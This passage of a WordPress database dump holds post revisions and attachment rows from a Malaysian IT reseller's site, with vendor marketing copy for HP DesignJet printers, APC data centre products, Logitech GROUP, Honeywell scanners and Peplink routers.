tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T120 Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T120_Gallery_image1_941x500_tcm245_2364857_tcm245_2372015_tcm245-2364857.jpg\" alt=\"HP DesignJet T120 Printer with architectural drawing output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivityÂ² and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T1700_Gallery_image1_941x500_tcm245_2540802_tcm245_2540822_tcm245-2540802.jpg\" alt=\"Right-facing view of HP DesignJet T1700 with colorful map output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T830_Gallery_image1_941x500_tcm245_2380328_tcm245_2380348_tcm245-2380328.jpg\" alt=\"HP DesignJet T830 Printer with colorful city view output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP','','inherit','closed','closed','','1528-revision-v1','','','2018-12-13 22:16:32','2018-12-13 14:16:32','',1528,'https://bintara.com.my/blog/2018/12/13/1528-revision-v1/',0,'revision','',0),(2086,1,'2018-12-13 22:20:16','2018-12-13 14:20:16','','APC_LockupLogo_tcm267-134996','','inherit','closed','closed','','apc_lockuplogo_tcm267-134996','','','2018-12-13 22:20:16','2018-12-13 14:20:16','',1438,'https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png',0,'attachment','image/png',0),(2087,1,'2018-12-13 22:20:32','2018-12-13 14:20:32','<img class=\" wp-image-1657 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/apc-malaysia-distributor.jpg\" alt=\"\" width=\"343\" height=\"185\" />\r\n<h3><img class=\"alignnone  wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"259\" height=\"124\" /></h3>\r\n<h3 class=\"info-article-image__title\">Infrastructure solutions for home and office</h3>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','inherit','closed','closed','','1438-revision-v1','','','2018-12-13 22:20:32','2018-12-13 14:20:32','',1438,'https://bintara.com.my/blog/2018/12/13/1438-revision-v1/',0,'revision','',0),(2092,1,'2018-12-13 22:25:32','2018-12-13 14:25:32','<img class=\"alignnone wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"259\" height=\"124\" />\r\n<h3 class=\"info-article-image__title\">Infrastructure solutions for home and office</h3>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','inherit','closed','closed','','1438-revision-v1','','','2018-12-13 22:25:32','2018-12-13 14:25:32','',1438,'https://bintara.com.my/blog/2018/12/13/1438-revision-v1/',0,'revision','',0),(2088,1,'2018-12-13 22:21:51','2018-12-13 14:21:51','<img class=\" wp-image-1657 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/apc-malaysia-distributor.jpg\" alt=\"\" width=\"343\" height=\"185\" />\r\n<h3><img class=\"alignnone wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"259\" height=\"124\" /></h3>\r\n<h3 class=\"info-article-image__title\">Infrastructure solutions for home and office</h3>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','inherit','closed','closed','','1438-revision-v1','','','2018-12-13 22:21:51','2018-12-13 14:21:51','',1438,'https://bintara.com.my/blog/2018/12/13/1438-revision-v1/',0,'revision','',0),(2089,1,'2018-12-13 22:22:03','2018-12-13 14:22:03','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech GROUP</h1>\r\nLogitech GROUP Video Conferencing System for mid to large rooms\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n&nbsp;\r\n\r\nPERFECT FOR LARGER ROOMS\r\n\r\nGROUP, our video conferencing solution for rooms that seat 14â€“20 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, itâ€™s easier than ever to include everyone in the conversation.\r\n\r\n</div>\r\nPLUG-AND-PLAY SIMPLICITY\r\nUSB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and youâ€™re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with BluetoothÂ® wireless technology to the GROUP speakerphone.\r\n\r\nOPTIONS GIVE YOU VERSATILITY\r\nCustomize the setup to match the layout and size of your room. Mount the camera on a table, tripod, or wall. Optional expansion mics extend audio coverage up to 28 feet (8.5 meters). Add an optional 33 feet (10 meter) or 49 feet (15 meter) cable to increase the reach of the speakerphone or camera.\r\n\r\nHIGH-DEFINITION VIDEO\r\nBring meetings into focus with GROUPâ€™s premium lens, 10x lossless zoom, and HD 1080p/30 performance. Perfectly frame presenters and whiteboards with pan/tilt control, and zoom in for detail and clarity. GROUPâ€™s 90Â° field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.\r\n\r\n&nbsp;\r\n\r\nNATURAL-SOUNDING AUDIO\r\nEveryone hears and can be heard with GROUPâ€™s full-duplex speakerphone, which delivers sound thatâ€™s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.','Logitech GROUP','','inherit','closed','closed','','2000-revision-v1','','','2018-12-13 22:22:03','2018-12-13 14:22:03','',2000,'https://bintara.com.my/blog/2018/12/13/2000-revision-v1/',0,'revision','',0),(2090,1,'2018-12-13 22:24:14','2018-12-13 14:24:14','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 22:24:14','2018-12-13 14:24:14','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2503,1,'2018-12-18 23:22:03','2018-12-18 15:22:03','','HP DesignJet T1700 Printer series','','inherit','closed','closed','','hp-designjet-t1700-printer-series','','','2018-12-18 23:22:03','2018-12-18 15:22:03','',1528,'https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg',0,'attachment','image/jpeg',0),(2093,1,'2018-12-13 22:27:29','2018-12-13 14:27:29','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech GROUP</h1>\r\nLogitech GROUP Video Conferencing System for mid to large rooms\r\n\r\nhttps://bintara.com.my/get-quotation-logitech/\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n&nbsp;\r\n\r\nPERFECT FOR LARGER ROOMS\r\n\r\nGROUP, our video conferencing solution for rooms that seat 14â€“20 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, itâ€™s easier than ever to include everyone in the conversation.\r\n\r\n</div>\r\nPLUG-AND-PLAY SIMPLICITY\r\nUSB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and youâ€™re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with BluetoothÂ® wireless technology to the GROUP speakerphone.\r\n\r\nOPTIONS GIVE YOU VERSATILITY\r\nCustomize the setup to match the layout and size of your room. Mount the camera on a table, tripod, or wall. Optional expansion mics extend audio coverage up to 28 feet (8.5 meters). Add an optional 33 feet (10 meter) or 49 feet (15 meter) cable to increase the reach of the speakerphone or camera.\r\n\r\nHIGH-DEFINITION VIDEO\r\nBring meetings into focus with GROUPâ€™s premium lens, 10x lossless zoom, and HD 1080p/30 performance. Perfectly frame presenters and whiteboards with pan/tilt control, and zoom in for detail and clarity. GROUPâ€™s 90Â° field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.\r\n\r\n&nbsp;\r\n\r\nNATURAL-SOUNDING AUDIO\r\nEveryone hears and can be heard with GROUPâ€™s full-duplex speakerphone, which delivers sound thatâ€™s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.\r\n\r\nhttps://bintara.com.my/get-quotation-logitech/','Logitech GROUP','','inherit','closed','closed','','2000-revision-v1','','','2018-12-13 22:27:29','2018-12-13 14:27:29','',2000,'https://bintara.com.my/blog/2018/12/13/2000-revision-v1/',0,'revision','',0),(2094,1,'2018-12-13 22:34:29','2018-12-13 14:34:29','<h3>Peplink</h3>\r\n<h4><strong>Simple, Unbreakable Branch Networking, Anywhere</strong></h4>\r\nFrom the companyâ€™s inception, we set out to create the most reliable and easiest-to-use routers. Since then, we have developed multi-WAN VPN bonding (SD-WAN) routers and access points withÂ industry-leading durability, a straightforward and intuitiveÂ web interface, and aÂ wide range of featuresÂ that are difficult to match.\r\n\r\nFromÂ home-office users, toÂ enterprise-branchÂ networks, toÂ emergency vehicles, we have helped thousands of customers migrate from traditional WAN to our SD-WAN solutions, resulting in increased bandwidth, higher WAN reliability, and lower costs.\r\n\r\n&nbsp;\r\n<h4><strong>Connect, Monitor, and Manage From the Cloud</strong></h4>\r\n<div class=\"column one-second\"></div>\r\n<div class=\"column one-second\">\r\n\r\nAs cloud computing came of age, we saw new ways to make networks easier to manage and more flexible than ever. We continued developing new products that provided SD-WAN capabilities.\r\n\r\nWeÂ virtualized our VPN bonding technology, enabling virtual machines running on popular platforms (such as Amazon Web Services), to build unbreakable VPN with our edge network devices and with each other. We developed aÂ cloud-based central controllerÂ that helps network administrators visualize, manage, and keep track of complex global WAN deployments via a single web console. Many formerly time-consuming tasks such as firmware updates, configuration changes, and VPN configuration can now all be done by the hundreds with just a few clicks.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h4><strong>Fully Integrated Networking Solution</strong></h4>\r\n<div class=\"column one-second\">\r\n\r\nFrom routers to access points to cloud platforms, we have everything you need to build a software-defined network that is fully configurable from any web browser. All our SD-WAN technologies are developed andÂ tested in-house, providing you with easy and seamless networking that you can always count on.\r\n\r\n</div>\r\n<div class=\"column one-second\">\r\n\r\nWe believe that quality, innovative products, and passionate customer service can help everyone experience a better connected world. Thatâ€™s why happy customers around the globe depend on Peplink.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]','Peplink','','inherit','closed','closed','','1572-autosave-v1','','','2018-12-13 22:34:29','2018-12-13 14:34:29','',1572,'https://bintara.com.my/blog/2018/12/13/1572-autosave-v1/',0,'revision','',0),(2095,1,'2018-12-13 22:34:17','2018-12-13 14:34:17','<h3>Peplink</h3>\r\n<h4><strong>Simple, Unbreakable Branch Networking, Anywhere</strong></h4>\r\nFrom the companyâ€™s inception, we set out to create the most reliable and easiest-to-use routers. Since then, we have developed multi-WAN VPN bonding (SD-WAN) routers and access points withÂ industry-leading durability, a straightforward and intuitiveÂ web interface, and aÂ wide range of featuresÂ that are difficult to match.\r\n\r\nFromÂ home-office users, toÂ enterprise-branchÂ networks, toÂ emergency vehicles, we have helped thousands of customers migrate from traditional WAN to our SD-WAN solutions, resulting in increased bandwidth, higher WAN reliability, and lower costs.\r\n\r\n&nbsp;\r\n<h4><strong>Connect, Monitor, and Manage From the Cloud</strong></h4>\r\n<div class=\"column one-second\"></div>\r\n<div class=\"column one-second\">\r\n\r\nAs cloud computing came of age, we saw new ways to make networks easier to manage and more flexible than ever. We continued developing new products that provided SD-WAN capabilities.\r\n\r\nWeÂ virtualized our VPN bonding technology, enabling virtual machines running on popular platforms (such as Amazon Web Services), to build unbreakable VPN with our edge network devices and with each other. We developed aÂ cloud-based central controllerÂ that helps network administrators visualize, manage, and keep track of complex global WAN deployments via a single web console. Many formerly time-consuming tasks such as firmware updates, configuration changes, and VPN configuration can now all be done by the hundreds with just a few clicks.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h4><strong>Fully Integrated Networking Solution</strong></h4>\r\n<div class=\"column one-second\">\r\n\r\nFrom routers to access points to cloud platforms, we have everything you need to build a software-defined network that is fully configurable from any web browser. All our SD-WAN technologies are developed andÂ tested in-house, providing you with easy and seamless networking that you can always count on.\r\n\r\n</div>\r\n<div class=\"column one-second\">\r\n\r\nWe believe that quality, innovative products, and passionate customer service can help everyone experience a better connected world. Thatâ€™s why happy customers around the globe depend on Peplink.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]','Peplink','','inherit','closed','closed','','1572-revision-v1','','','2018-12-13 22:34:17','2018-12-13 14:34:17','',1572,'https://bintara.com.my/blog/2018/12/13/1572-revision-v1/',0,'revision','',0),(2142,1,'2018-12-14 11:02:51','2018-12-14 03:02:51','<h3 class=\"font-lh3 \">HP DesignJet large-format office printers</h3>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T120 Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T120_Gallery_image1_941x500_tcm245_2364857_tcm245_2372015_tcm245-2364857.jpg\" alt=\"HP DesignJet T120 Printer with architectural drawing output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T1700_Gallery_image1_941x500_tcm245_2540802_tcm245_2540822_tcm245-2540802.jpg\" alt=\"Right-facing view of HP DesignJet T1700 with colorful map output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T830_Gallery_image1_941x500_tcm245_2380328_tcm245_2380348_tcm245-2380328.jpg\" alt=\"HP DesignJet T830 Printer with colorful city view output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3></h3>\r\n<h3 class=\"font-lh3 \">HP DesignJet large-format production printers</h3>\r\n<div class=\"description\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</div>\r\n</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T3500_Gallery_image1_941x500_tcm245_2383669_tcm245_2383644_tcm245-2383669.jpg\" alt=\"Side view of the HP DesignJet T3500 Production Multifunction Printer\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Productivity in full color</h3>\r\n<div class=\"description\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6610 Production Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/1_tcm245_2638421_tcm245_2624395_tcm245-2638421.jpg\" alt=\"HP DesignJet Z6610 Production Printer with gold fashion ad for output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The fastest graphics production printing solution</h3>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6810 Production Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/Gallery_3_tcm245_2625574_tcm245_2625583_tcm245-2625574.jpg\" alt=\"Gold jewelry ad on HP DesignJet Z6810 Printer\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Meet customer high-quality expectations with the fastest production printing solution</h3>\r\nConsistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.\r\n\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></br></div>\r\n<div></br></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP','','inherit','closed','closed','','1528-revision-v1','','','2018-12-14 11:02:51','2018-12-14 03:02:51','',1528,'https://bintara.com.my/blog/2018/12/14/1528-revision-v1/',0,'revision','',0),(2096,1,'2018-12-13 22:42:00','2018-12-13 14:42:00','<h3 class=\"font-lh3 \">HP DesignJet large-format office printers</h3>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T120 Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T120_Gallery_image1_941x500_tcm245_2364857_tcm245_2372015_tcm245-2364857.jpg\" alt=\"HP DesignJet T120 Printer with architectural drawing output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T1700_Gallery_image1_941x500_tcm245_2540802_tcm245_2540822_tcm245-2540802.jpg\" alt=\"Right-facing view of HP DesignJet T1700 with colorful map output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T830_Gallery_image1_941x500_tcm245_2380328_tcm245_2380348_tcm245-2380328.jpg\" alt=\"HP DesignJet T830 Printer with colorful city view output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the 